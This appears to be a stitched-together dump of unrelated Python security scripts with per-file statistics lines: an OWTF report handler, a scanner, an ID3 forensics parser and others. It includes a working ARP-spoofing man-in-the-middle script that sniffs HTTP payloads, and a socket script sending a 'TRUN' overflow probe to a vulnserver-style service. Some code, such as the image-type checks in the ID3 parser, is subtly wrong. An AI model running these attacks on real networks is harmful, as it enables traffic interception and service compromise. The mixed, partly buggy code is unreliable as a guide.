raise APIError(400, "Missing target id")
try:
filter_data = dict(self.request.arguments)
plugin_outputs = get_all_poutputs(filter_data, target_id=target_id, inc_output=True)
except exceptions.InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
except exceptions.InvalidParameterType:
raise APIError(400, "Invalid parameter type provided")
# Group the plugin outputs to make it easier in template
grouped_plugin_outputs = defaultdict(list)
for output in plugin_outputs:
output["rank"] = RANKS.get(max(output["user_rank"], output["owtf_rank"]))
grouped_plugin_outputs[output["plugin_code"]].append(output)
# Needed ordered list for ease in templates
grouped_plugin_outputs = collections.OrderedDict(sorted(grouped_plugin_outputs.items()))
# Get mappings
mapping_type = self.get_argument("mapping", None)
mappings = {}
if mapping_type and mapping_type in SUPPORTED_MAPPINGS:
for k, v in iteritems(MAPPINGS):
if v.get(mapping_type, None) is not None:
mappings[k] = v[mapping_type]
# Get test groups as well, for names and info links
test_groups = {}
for test_group in TestGroup.get_all(self.session):
test_group["mapped_code"] = test_group["code"]
test_group["mapped_descrip"] = test_group["descrip"]
if mappings and test_group["code"] in mappings:
code, description = mappings[test_group["code"]]
test_group["mapped_code"] = code
test_group["mapped_descrip"] = description
test_groups[test_group["code"]] = test_group
vulnerabilities = []
for key, value in list(grouped_plugin_outputs.items()):
test_groups[key]["data"] = value
vulnerabilities.append(test_groups[key])
result = get_target_config_by_id(target_id)
result["vulnerabilities"] = vulnerabilities
result["time"] = strftime("%Y-%m-%d %H:%M:%S", gmtime())
if result:
self.success(result)
else:
raise APIError(500, "No config object exists for the given target")
| 35.637097 | 96 | 0.57904 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalSessionManagement")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.090909 | 75 | 0.783699 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
server = '192.168.214.5'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
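# 'TRUN .' plus a short run of 'A's exercises what looks like vulnserver's TRUN
# handler; lengthening the filler is the usual next step when probing for the
# overflow (an assumption about the target, not stated in the original script).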
s.send(('TRUN .' + 'A'*50 + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close() | 22.666667 | 53 | 0.667845 |
Ethical-Hacking-Scripts | import socket, threading, sys, ipaddress, time, os
from optparse import OptionParser
from scapy.all import *
class Port_Scanner:
def __init__(self, ip, ports):
self.ip = str(ip)
self.logfile = "squidmap.txt"
file = open(self.logfile,"w")
file.close()
self.isnetwork = False
self.isonehost = True
if "/24" in self.ip:
self.hosts = []
self.uphosts = []
self.isnetwork = True
self.isonehost = False
print(self.logo())
self.log_output(self.logo())
print(f"[+] Output will be saved in file: {os.path.join(os.getcwd(),self.logfile)}")
self.max_port = ports
self.ports = range(ports)
self.ports_scanned = 0
self.open_ports = []
self.checked_hosts = 0
self.banners = []
if self.isnetwork:
print("[+] Sending ICMP Packets to Network to check for online IP's.\n[+] Please wait.....\n")
self.networkscan()
if self.isonehost:
self.port_scan(self.ip)
def ping_host(self, host):
if sys.platform == "win32":
result = os.popen(f"ping {host} -n 1")
result2 = result.read()
else:
try:
result = os.popen(f"ping {host} -c 1")
result2 = result.read()
except:
result2 = ""
if "unreachable" in result2 or "100% loss" in result2 or "100.0% packet loss" in result2:
pass
else:
print(f"[+] {host} is up!")
self.uphosts.append(str(host))
self.checked_hosts += 1
def networkscan(self):
self.ip = str(self.ip)
self.split_ip = self.ip.split(".")
if not self.split_ip[len(self.split_ip)-1].startswith("0"):
self.split_ip.remove(self.split_ip[len(self.split_ip)-1])
self.split_ip.append("0/24")
self.result = ""
item = 0
for i in self.split_ip:
if item != len(self.split_ip)-1:
self.result = self.result + i + "."
else:
self.result = self.result + i
item += 1
self.ip = self.result
self.network = ipaddress.IPv4Network(self.ip)
for host in self.network.hosts():
self.hosts.append(str(host))
for host in self.hosts:
check_host = threading.Thread(target=self.ping_host, args=(host,))
check_host.start()
while True:
if self.checked_hosts >= len(self.hosts):
print(f"[+] Hosts Scan done.\n[+] Online Hosts: {self.uphosts}")
break
for host in self.uphosts:
portscan = threading.Thread(target=self.port_scan, args=(host,))
portscan.start()
def get_mac(self, ip):
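        # broadcast an ARP who-has for ip and return the MAC address from the first reply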
arp = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
recv = srp(arp, timeout=2, verbose=False)
return recv[0][0][1].hwsrc
def log_output(self,msg):
time.sleep(1)
file = open(self.logfile,"r")
content = file.read()
file.close()
file = open(self.logfile,"w")
file.write(content+"\n")
file.write(msg)
file.close()
def logo(self):
return """
_________ .__ .___ _____ _____ _______
/ _____/ ________ __|__| __| _// \ _____ ______ ___ __/ | | \ _ \
\_____ \ / ____/ | \ |/ __ |/ \ / \\\__ \ \____ \ \ \/ / | |_ / /_\ \
/ < <_| | | / / /_/ / Y \/ __ \| |_> > \ / ^ / \ \_/ \\
/_______ /\__ |____/|__\____ \____|__ (____ / __/ \_/\____ | /\ \_____ /
\/ |__| \/ \/ \/|__| |__| \/ \/
Vulnerability-Scanner By DrSquid"""
def port_scan(self, ip):
print(f"[+] Beginning Port Scan On {ip}.")
mac = "Unknown"
reversedns = "Unknown"
try:
mac = self.get_mac(ip)
print(f"[+] {ip}'s MAC Address: {mac}")
except:
print(f"[+] Unable to obtain MAC Address from: {ip}")
try:
reversedns = socket.gethostbyaddr(ip)
print(f"[+] Reverse DNS of {ip}: {reversedns[0]}")
except:
print(f"[+] Unable to get Reverse DNS of {ip}.")
for port in self.ports:
scanning = threading.Thread(target=self.scan,args=(ip, port))
scanning.start()
while True:
if self.ports_scanned >= self.max_port:
open_ports = []
appendmsg = ""
msg=f"[+] Port Scan on {ip} Completed.\n[+] Obtained Banners For {ip}."
for port in self.open_ports:
if ip+" " in port:
port_split = port.split()
open_ports.append(port_split[1])
if len(open_ports) == 0:
appendmsg=f"\n[+] There are no Ports Open on {ip}."
else:
appendmsg=f"\n[+] Open Ports on {ip}: {open_ports}"
for port in open_ports:
for banner in self.banners:
split_banner = banner.split()
if ip in split_banner[0] and port in split_banner[1]:
result = ""
del split_banner[0]
del split_banner[0]
for item in split_banner:
result = result + " " + item
result = result.strip()
appendmsg += f"\n[+] {ip} Port {port} Banner: {result}"
msg += appendmsg
print(msg)
logmsg = "\n"+msg+f"\n[+] {ip}'s MAC Address: {mac}\n[+] Reverse DNS of {ip}: {reversedns[0]}"
self.log_output(logmsg)
break
def scan(self, ip, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ip, port))
self.open_ports.append(f"{ip} {port}")
s.settimeout(10)
print(f"[!] Discovered Open Port on {ip}: {port}")
try:
banner = s.recv(65500).decode().strip("\n").strip("\r")
self.banners.append(f"{ip} {port} {banner}")
except Exception as e:
self.banners.append(f"{ip} {port} None")
s.close()
except Exception as e:
pass
self.ports_scanned += 1
class OptionParse:
def __init__(self):
if len(sys.argv) < 2:
self.usage()
else:
self.get_args()
def usage(self):
print(Port_Scanner.logo(None))
print("""
[+] Option-Parsing Help:
[+] --ip, --ipaddr - Specifies an IP Address to Scan(can be a network).
[+] --p, --ports - Specifies the amount of ports to Scan.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 Squidmap.py --ip <ipaddr> --p <ports>")
print("[+] python3 Squidmap.py --i")
else:
print("[+] Squidmap --ip <ipaddr> --p <ports>")
print("[+] Squidmap --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--ip","--ipaddr",dest="ip")
self.opts.add_option("--p","--port",dest="port")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt =self.opts.parse_args()
if args.info is not None:
self.usage()
sys.exit()
else:
pass
if args.ip is None:
self.usage()
else:
ip = args.ip
if args.port is None:
ports = 1024
else:
try:
ports = int(args.port)
except:
print("[+] Invalid Port!")
sys.exit()
SquidMap = Port_Scanner(ip, ports)
try:
from scapy.all import *
except:
Port_Scanner.logo(None)
print("[+] Scapy is required to run this script.\n[+] Run this command if you have python: pip install scapy")
sys.exit()
parser = OptionParse()
| 39.731132 | 115 | 0.446491 |
Python-Penetration-Testing-Cookbook | import sys
import os
from scapy.all import *
interface = "en0"
source_ip = "192.168.1.1"
destination_ip = "192.168.1.35"
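# NOTE: ARP spoofing requires root privileges; the interface name and the two IP
# addresses above are test-LAN values and must be adapted to your environment.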
def getMAC(IP, interface):
    answered, unanswered = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 5, iface=interface, inter = 0.1)
    for send, receive in answered:
        return receive.sprintf(r"%Ether.src%")
def setIPForwarding(set):
if set:
#for OSX
os.system('sysctl -w net.inet.ip.forwarding=1')
#for Linux
#os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
else:
#for OSX
os.system('sysctl -w net.inet.ip.forwarding=0')
        #for Linux
        #os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
def resetARP(destination_ip, source_ip, interface):
destinationMAC = getMAC(destination_ip, interface)
sourceMAC = getMAC(source_ip, interface)
send(ARP(op=2, pdst=source_ip, psrc=destination_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=destinationMAC, retry=7))
send(ARP(op=2, pdst=destination_ip, psrc=source_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=sourceMAC, retry=7))
setIPForwarding(False)
def mitm(destination_ip, destinationMAC, source_ip, sourceMAC):
arp_dest_to_src = ARP(op=2, pdst=destination_ip, psrc=source_ip, hwdst=destinationMAC)
arp_src_to_dest = ARP(op=2, pdst=source_ip, psrc=destination_ip, hwdst=sourceMAC)
send(arp_dest_to_src)
send(arp_src_to_dest)
def callBackParser(packet):
if IP in packet:
source_ip = packet[IP].src
destination_ip = packet[IP].dst
print("From : " + str(source_ip) + " to -> " + str(destination_ip))
if TCP in packet:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
print(packet[TCP].payload)
except:
pass
def main():
setIPForwarding(True)
try:
destinationMAC = getMAC(destination_ip, interface)
except Exception as e:
setIPForwarding(False)
print(e)
sys.exit(1)
try:
sourceMAC = getMAC(source_ip, interface)
except Exception as e:
setIPForwarding(False)
print(e)
sys.exit(1)
while True:
try:
mitm(destination_ip, destinationMAC, source_ip, sourceMAC)
sniff(iface=interface, prn=callBackParser,count=10)
except KeyboardInterrupt:
resetARP(destination_ip, source_ip, interface)
break
sys.exit(1)
main() | 29.7125 | 121 | 0.617264 |
cybersecurity-penetration-testing | import socket
host = "192.168.0.1"
port = 12346
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.bind((host,port))
s.settimeout(5)
data, addr = s.recvfrom(1024)
print "recevied from ",addr
print "obtained ", data
s.close()
except socket.timeout :
print "Client not connected"
s.close() | 18.3125 | 52 | 0.694805 |
Python-Penetration-Testing-for-Developers | import urllib2
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
api_response = api_response.split("\n")
for line in api_response:
if "displayName" in line:
print line | 35 | 119 | 0.705882 |
cybersecurity-penetration-testing | '''
MP3-ID3Forensics
Python Script (written completely in Python)
For the extraction of meta data and
potential evidence hidden in MP3 files
specifically in the ID3 Headers
Author C. Hosmer
Python Forensics
Copyright (c) 2015-2016 Chet Hosmer / Python Forensics, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
'''
# IMPORT MODULES
# Standard Python Libraries
import os # Standard Operating System Methods
import argparse # Command Line Argument Parsing
from struct import * # Handle Strings as Binary Data
import string # Special string Module
import time # Date Time Module
import logging # Script Logging (needed by the non-verbose branch in main)
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
#
# Print Hexidecimal / ASCII Page Heading
#
def PrintHeading():
print("Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ASCII")
print("------------------------------------------------------------------------------------------------")
return
# End PrintHeading
#
# Print ID3 Frame Contents
#
# Input: buff - Holding the frame content
# buffSize - Size of the frame contents
#
def PrintContents(buff, buffSize):
PrintHeading()
offset = 0
# Loop through 1 line at a time
for i in range(offset, offset+buffSize, 16):
# Print the current offset
print "%08x " % i,
# Print 16 Hex Bytes
for j in range(0,16):
if i+j >= buffSize:
print ' ',
else:
byteValue = ord(buff[i+j])
print "%02x " % byteValue,
print " ",
# Print 16 Ascii equivelents
for j in range (0,16):
if i+j >= buffSize:
break
byteValue = ord(buff[i+j])
# If printable characters print them
if (byteValue >= 0x20 and byteValue <= 0x7f):
print "%c" % byteValue,
else:
print '.',
print
return
# End Print Buffer
'''
ID3 Class
Extracting Meta and Evidence from mp3 files
'''
class ID3():
#Class Constructor
def __init__(self, theFile):
# Initialize Attributes of the Object
# Local Constants
self.KNOWN_TAGS_V3 = {
'AENC': 'Audio encryption: ',
'APIC': 'Attached picture: ',
'COMM': 'Comments: ',
'COMR': 'Commercial frame: ',
'ENCR': 'Encryption method registration: ',
'EQUA': 'Equalization: ',
'ETCO': 'Event timing codes: ',
'GEOB': 'General encapsulated object: ',
'GRID': 'Grp identification registration: ',
'IPLS': 'Involved people list: ',
'LINK': 'Linked information: ',
'MCDI': 'Music CD identifier: ',
'MLLT': 'MPEG location lookup table: ',
'OWNE': 'Ownership frame: ',
'PRIV': 'Private frame: ',
'PCNT': 'Play counter: ',
'POPM': 'Popularimeter: ',
'POSS': 'Position synchronisation frame: ',
'RBUF': 'Recommended buffer size: ',
'RGAD': 'Replay Gain Adjustment: ',
'RVAD': 'Relative volume adjustment: ',
'RVRB': 'Reverb: ',
'SYLT': 'Synchronized lyric/text: ',
'SYTC': 'Synchronized tempo codes: ',
'TALB': 'Album/Movie/Show title: ',
'TBPM': 'BPM beats per minute: ',
'TCOM': 'Composer: ',
'TCON': 'Content type: ',
'TCOP': 'Copyright message: ',
'TDAT': 'Date: ',
'TDLY': 'Playlist delay: ',
'TDRC': 'Recording Time: ',
'TENC': 'Encoded by: ',
'TEXT': 'Lyricist/Text writer: ',
'TFLT': 'File type: ',
'TIME': 'Time: ',
'TIT1': 'Content group description: ',
'TIT2': 'Title/songname/content descrip: ',
'TIT3': 'Subtitle/Description refinement: ',
'TKEY': 'Initial key: ',
'TLAN': 'Language: ',
'TLEN': 'Length: ',
'TMED': 'Media type: ',
'TOAL': 'Original album/movie/show title: ',
'TOFN': 'Original filename: ',
'TOLY': 'Original lyricist/text writer: ',
'TOPE': 'Original artist/performer: ',
'TORY': 'Original release year: ',
'TOWN': 'File owner/licensee: ',
'TPE1': 'Lead performer/Soloist: ',
'TPE2': 'Band/orchestra/accompaniment: ',
'TPE3': 'Conductor/performer refinement: ',
'TPE4': 'Interpreted, remixed, modified by:',
'TPOS': 'Part of a set: ',
'TPUB': 'Publisher: ',
'TRCK': 'Track number/Position in set: ',
'TRDA': 'Recording dates: ',
'TRSN': 'Internet radio station name: ',
'TRSO': 'Internet radio station owner: ',
'TSIZ': 'Size: ',
'TSRC': 'Intl standard recording code: ',
'TSSE': 'SW/HW settings used for encoding: ',
            'TYER': 'Year: ',
'TXXX': 'User define general text frame: ',
'UFID': 'Unique file identifier: ',
'USER': 'Terms of use: ',
'USLT': 'Unsyched lyric/text transcription:',
'WCOM': 'Commercial information: ',
            'WCOP': 'Copyright/Legal information: ',
'WOAF': 'Official audio file webpage: ',
'WOAR': 'Official artist/performer webpage:',
'WOAS': 'Official audio source webpage: ',
'WORS': 'Official internet radio homepage: ',
'WPAY': 'Payment: ',
'WPUB': 'Publishers official webpage: ',
'WXXX': 'User defined URL link frame: '
}
self.KNOWN_TAGS_V2 = {
'BUF': 'Recommended buffer size',
'COM': 'Comments',
'CNT': 'Play counter',
'CRA': 'Audio Encryption',
'CRM': 'Encrypted meta frame',
'ETC': 'Event timing codes',
'EQU': 'Equalization',
'GEO': 'General encapsulated object',
'IPL': 'Involved people list',
'LNK': 'Linked information',
'MCI': 'Music CD Identifier',
'MLL': 'MPEG location lookup table',
'PIC': 'Attached picture',
'POP': 'Popularimeter',
'REV': 'Reverb',
'RVA': 'Relative volume adjustment',
'SLT': 'Synchronized lyric/text',
'STC': 'Synced tempo codes',
'TAL': 'Album/Movie/Show title',
'TBP': 'BPM Beats Per Minute',
'TCM': 'Composer',
'TCO': 'Content type',
'TCR': 'Copyright message',
'TDA': 'Date',
'TDY': 'Playlist delay',
'TEN': 'Encoded by',
'TFT': 'File type',
'TIM': 'Time',
'TKE': 'Initial key',
'TLA': 'Languages',
'TLE': 'Length',
'TMT': 'Media type',
'TOA': 'Original artists/performers',
'TOF': 'Original filename',
'TOL': 'Original Lyricists/text writers',
'TOR': 'Original release year',
'TOT': 'Original album/Movie/Show title',
'TP1': 'Lead artist(s)/Lead performer(s)/Soloist(s)/Performing group',
'TP2': 'Band/Orchestra/Accompaniment',
'TP3': 'Conductor/Performer refinement',
'TP4': 'Interpreted, remixed, or otherwise modified by',
'TPA': 'Part of a set',
'TPB': 'Publisher',
'TRC': 'International Standard Recording Code',
'TRD': 'Recording dates',
'TRK': 'Track number/Position in set',
'TSI': 'Size',
'TSS': 'Software/hardware and settings used for encoding',
'TT1': 'Content group description',
'TT2': 'Title/Songname/Content description',
'TT3': 'Subtitle/Description refinement',
'TXT': 'Lyricist/text writer',
            'TXX': 'User defined text frame',
            'TYE': 'Year',
'UFI': 'Unique file identifier',
'ULT': 'Unsychronized lyric/text transcription',
'WAF': 'Official audio file webpage',
'WAR': 'Official artist/performer webpage',
'WAS': 'Official audio source webpage',
'WCM': 'Commercial information',
'WCP': 'Copyright/Legal information',
'WPB': 'Publishers official webpage',
'WXX': 'User defined URL link frame'
}
self.picTypeList = [
'Other',
'fileIcon',
'OtherIcon',
'FrontCover',
'BackCover',
'LeafletPage',
'Media',
'LeadArtist',
'ArtistPerformer',
'Conductor',
'BandOrchestra',
'Composer',
'Lyricist',
'RecordingLocation',
'DuringRecording',
'DuringPerformance',
'MovieScreenCapture',
'Fish',
'Illustration',
'BandArtistLogo',
'PublisherStudioLogo'
]
# Attributes of the Class
self.fileName = ''
self.id3Size = 0
self.fileContents = ''
self.mp3 = False
self.id3 = False
self.hdr = ''
self.flag = 0
self.version = 0
self.revision = 0
self.unsync = False
self.extendedHeader = False
self.experimental = False
self.hasPicture = False
self.imageCount = 0
self.frameList = []
self.padArea = ''
# Now Process the Proposed MP3 File
try:
self.fileName = theFile
with open(theFile, 'rb') as mp3File:
self.fileContents = mp3File.read()
except:
print "Could not process input file: ", theFile
quit()
#Strip off the first 10 characters of the file
stripHeader = self.fileContents[0:6]
#now unpack the header
id3Header = unpack('3sBBB', stripHeader)
self.hdr = id3Header[0]
self.version = id3Header[1]
self.revision = id3Header[2]
self.flag = id3Header[3]
if self.hdr == 'ID3' and self.version in range(2,4):
self.id3 = True
else:
self.id3 = False
print "MP3 File type not supported"
quit()
# If we seem to have a valid MP3 ID3 Header
# Attempt to Process the Header
# Get Size Bytes and unpack them
stripSize = self.fileContents[6:10]
id3Size = unpack('BBBB', stripSize)
# Calculate the Size (this is a bit tricky)
# and add in the 10 byte header not included
# in the size
self.id3Size = self.calcID3Size(id3Size) + 10
        # check the unsync flag (bit 7)
        if self.flag & 0x80:
            self.unsync = True
        # check the extended header flag (bit 6)
        if self.flag & 0x40:
            self.extendedHeader = True
        # check the experimental indicator (bit 5)
        if self.flag & 0x20:
            self.experimental = True
self.processID3Frames()
return
'''
Print out any extracted header information
'''
def printResults(self):
print "==== MP3/ID3 Header Information"
print "ID3 Found: ", self.id3
if self.id3:
print "File: ", self.fileName
print "ID3 Hdr Size: ", self.hdr
print "Version: ", self.version
print "Revision: ", self.revision
print "Size: ", self.id3Size
print "Unsync ", self.unsync
print "Extended Header: ", self.extendedHeader
print "Experimental: ", self.experimental
print "Images Found: ", str(self.imageCount)
print "\n------------------------------------------------------------------------"
print "ID3 Frames"
print "------------------------------------------------------------------------"
for entry in self.frameList:
print "FrameID: ", entry[0]
print "Frame Type: ", entry[1]
print "Frame Size: ", entry[2]
print "Tag Preservation: ", entry[4]
print "File Preservation: ", entry[5]
print "Read Only: ", entry[6]
print "Compressed: ", entry[7]
print "Encrypted: ", entry[8]
print "Group Identity: ", entry[9]
print "\nFrame Content:\n"
PrintContents(entry[3], len(entry[3]))
print "====================================================================================================\n"
print "\nPad Area - Size", len(self.padArea)
if len(self.padArea) != 0:
PrintContents(self.padArea, len(self.padArea))
print "\n\n END PyMP3 Forensics"
def processID3Frames(self):
if self.id3:
# starting first frame location
frameOffset = 10
imageCount = 0
# Loop Through all the frames until we reach
# Null ID
# while self.fileContents[frameOffset] != '\000':
while frameOffset < self.id3Size:
# check for padding
if self.fileContents[frameOffset] == '\000':
# we are at the end of the frame
# and we have found padding
# record the pad area
self.padArea = self.fileContents[frameOffset:self.id3Size]
break
if self.version == 2:
# Version 2 Headers contain
# 6 bytes
# sss = type
# xxx = size
frameID = self.fileContents[frameOffset:frameOffset+3]
if frameID in self.KNOWN_TAGS_V2:
frameDescription = self.KNOWN_TAGS_V2[frameID]
else:
frameDescription = 'Unknown'
frameOffset +=3
stripSize = self.fileContents[frameOffset:frameOffset+3]
frameOffset +=3
frameSize = unpack('BBB', stripSize)
integerFrameSize = self.calcFrameSize(frameSize)
# If the frame is a picture
# extract the contents of the picture and create
# a separate file
if frameID == "PIC":
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 2, integerFrameSize, self.imageCount)
# For version 2 set all version 3 flags to False
tagPreservation = False
filePreservation = False
readOnly = False
compressed = False
encrypted = False
groupID = 0
elif self.version == 3:
# Version 3 Headers contain
# 10 Bytes
# ssss = Type
# xxxx = size
# xx = flags
v3Header = self.fileContents[frameOffset:frameOffset+10]
frameOffset += 10
try:
frameHeader = unpack('!4sIBB', v3Header)
except:
print "Unpack Failed"
quit()
frameID = frameHeader[0]
integerFrameSize = frameHeader[1]
flag1 = frameHeader[2]
flag2 = frameHeader[3]
if frameID == 'APIC':
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 3, integerFrameSize, self.imageCount)
if frameID in self.KNOWN_TAGS_V3:
frameDescription = self.KNOWN_TAGS_V3[frameID]
else:
frameDescription = 'Unknown'
                    # flag1 layout is %abc00000: a=tag alter, b=file alter, c=read only
                    if flag1 & 0x80:
                        tagPreservation = False
                    else:
                        tagPreservation = True
                    if flag1 & 0x40:
                        filePreservation = False
                    else:
                        filePreservation = True
                    if flag1 & 0x20:
                        readOnly = True
                    else:
                        readOnly = False
                    # flag2 layout is %ijk00000: i=compression, j=encryption, k=grouping
                    if flag2 & 0x80:
                        compressed = True
                    else:
                        compressed = False
                    if flag2 & 0x40:
                        encrypted = True
                    else:
                        encrypted = False
                    if flag2 & 0x20:
                        groupID = True
                    else:
                        groupID = False
else:
print "Version Not Supported"
quit()
frameContent = self.fileContents[frameOffset:frameOffset+integerFrameSize]
frameOffset += integerFrameSize
# Add frame information
self.frameList.append([frameID, frameDescription, integerFrameSize, frameContent, tagPreservation, filePreservation, readOnly, compressed, encrypted, groupID] )
print frameID, frameDescription,
if frameContent[0] == "\000":
frameDump = frameContent[1:]
else:
frameDump = frameContent
frameSnip = ''
if frameID == "COMM":
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
continue
else:
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
break
print frameSnip[0:80]
print
return
'''
extractPicture from ID3 Frame
input: offset to the frame
version (2 or 3)
writes output to an images directory
note the images directory must exist
./images/
'''
def extractPicture(self, off, ver, lenOfFrame, imgCnt):
if ver == 2:
# Now extract the picture type
picType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
picType = picType+self.fileContents[typeOffset]
typeOffset+=1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+".image"+str(imgCnt)+"."+picType
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
elif ver == 3:
# Now extract the picture type
mimeType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
mimeType = mimeType+self.fileContents[typeOffset]
typeOffset+=1
# Set the file extension based on the mime type
if mimeType.find('jpeg'):
ext = "jpg"
elif mimeType.find('png'):
ext = "png"
else:
ext = "dat"
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Next Byte is the Picture Type
picType = self.fileContents[typeOffset]
intPicType = ord(picType)
            if intPicType >= 0 and intPicType < len(self.picTypeList):
picTypeStr = self.picTypeList[intPicType]
else:
picTypeStr = "Unknown"
typeOffset += 1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+'.'+picTypeStr+'.'+str(imgCnt)+"."+ext
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
'''
Calculate the ID3 Size
The ID3 Size is 28 bits spread over 4 bytes in Big Endian Format
the MSB of each byte is ignored and the remaining 7 bits of each byte are
concatenated together to produce a 28 bit string.
For example the four byte size shown below:
0x0 0x1 0x4a 0x3
Creates the following 28 bit string
0000000000000110010100000011
for a decimal integer value of:
25859
Adding in the 10 header bytes (which is not included in the size)
the total size is:
25869
Excerpt from ID3 Standard
The ID3 tag size is the size of the complete tag after
unsychronisation, including padding, excluding the header (total tag
size - 10). The reason to use 28 bits (representing up to 256MB) for
size description is that we don't want to run out of space here.
calcID3Size(receives a tuple of the four bytes)
'''
def calcID3Size(self, bytes):
# Convert the tuple to a list for easy processing
bytes = list(bytes)
# Ensure that the MSB of each Byte is zero
bytes[0] = bytes[0] & 0x7f
bytes[1] = bytes[1] & 0x7f
bytes[2] = bytes[2] & 0x7f
bytes[3] = bytes[3] & 0x7f
# Initialize the bit string we will create
bits = ""
# loop through each byte setting each
# to a '1' or '0' starting with bit 6
for val in bytes:
i = 64
# continue until we process all bits
# from bit 6-0
while i > 0:
if val & i:
bits = bits + '1'
else:
bits = bits + '0'
# move to the next lower bit
i = i/2
# Now simply Convert the Binary String to an Integer
integerSize = int(bits,2)
return integerSize
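    # A hedged equivalent (same 7-bit synchsafe layout, added for illustration):
    #
    #   def calcID3Size(self, bytes):
    #       b = [x & 0x7f for x in bytes]
    #       return (b[0] << 21) | (b[1] << 14) | (b[2] << 7) | b[3]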
'''
Calculate the Frame size from the 3 hex bytes provided
Excerpt from ID3v2 Standard
The three character frame identifier is followed by a three byte size
descriptor, making a total header size of six bytes in every frame.
The size is calculated as framesize excluding frame identifier and
size descriptor (frame size - 6).
calcFrameSize(receives a tuple of the three bytes)
'''
def calcFrameSize(self, bytes):
valList = list(bytes)
finalValue = valList[0] << 16
finalValue = finalValue | valList[1] << 8
finalValue = finalValue | valList[2]
return finalValue
'''
Main Program
'''
def main():
print
print "Python Forensics, Inc. www.python-forensics.org"
print "Python MP3 Forensics v 1.0 June 2016"
print "developed by: C. Hosmer"
print
print "Script Started", GetTime()
print
# Process the command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('mp3File')
theArgs = parser.parse_args()
# Obtain the single argument which is the
# full path name of the file to process
mp3File = theArgs.mp3File
# set the output to verbose
verbose = True
print "Processing MP3 File: ", mp3File
print
# Process the mp3File
objID3 = ID3(mp3File)
# If verbose is selected the print results to standard out
# otherwise create a log file
if objID3.id3:
if verbose:
objID3.printResults()
else:
# Turn on Logging
logging.basicConfig(filename='pSearchLog.log',level=logging.DEBUG,format='%(asctime)s %(message)s')
objID3.logResults()
if __name__ == "__main__":
main() | 34.978287 | 176 | 0.450796 |
cybersecurity-penetration-testing |
'''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Python HashSearch for MPE+
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 April 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
import time # Basic Time Module
import logging # Script Logging
import hashlib # Python Hashing Module
from sys import argv # Command Line arguments
# Import 3rd Party Modules
# End of Script Module Importing
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: Hash Search for MPE+ "
